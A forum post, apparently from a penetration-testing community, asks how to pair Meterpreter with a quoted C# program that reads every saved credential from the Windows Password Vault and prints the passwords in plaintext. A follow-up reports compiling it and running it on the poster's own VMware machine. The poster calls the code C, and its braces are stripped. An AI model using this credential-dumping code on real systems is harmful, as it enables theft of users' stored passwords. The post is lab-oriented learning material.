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Hey guys, I have followed the video reviews for quite some time, congratulations on the great show.

Meterpreter has some automated scripts for downloading stored firefox, IE, and chrome password credentials.

The thing is that from IE10 and forward they are now stored in the windows credential manager, and so the script doesn't apply anymore. I found this little piece of code in raidersec.blogspot written in C that seems to retrieve these.

What could be the best way to use it with meterpreter? Do I need to compile it, upload it, and run it from native shell?

Thanks in advance

using System;

using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using Windows.Security.Credentials;

namespace PasswordVaultTest
class Program
static void Main(string[] args)
// Create a handle to the Widnows Password vault
Windows.Security.Credentials.PasswordVault vault = new PasswordVault();
// Retrieve all the credentials from the vault
IReadOnlyList<PasswordCredential> credentials = vault.RetrieveAll();
// The list returned is an IReadOnlyList, so there is no enumerator.
// No problem, we'll just see how many credentials there are and do it the
// old fashioned way
for (int i = 0; i < credentials.Count; i++)
// Obtain the credential
PasswordCredential cred = credentials.ElementAt(i);
// "Fill in the password" (I wish I knew more about what this was doing)
// Print the result
Console.WriteLine(cred.Resource + ':' + cred.UserName + ':' + cred.Password);

For anyone bumping into this, didn't actually find a way to use it with metasploit so I just compiled it, used meterpreter to download it and open a shell on my windows VMware and run it there, it worked fine ;)


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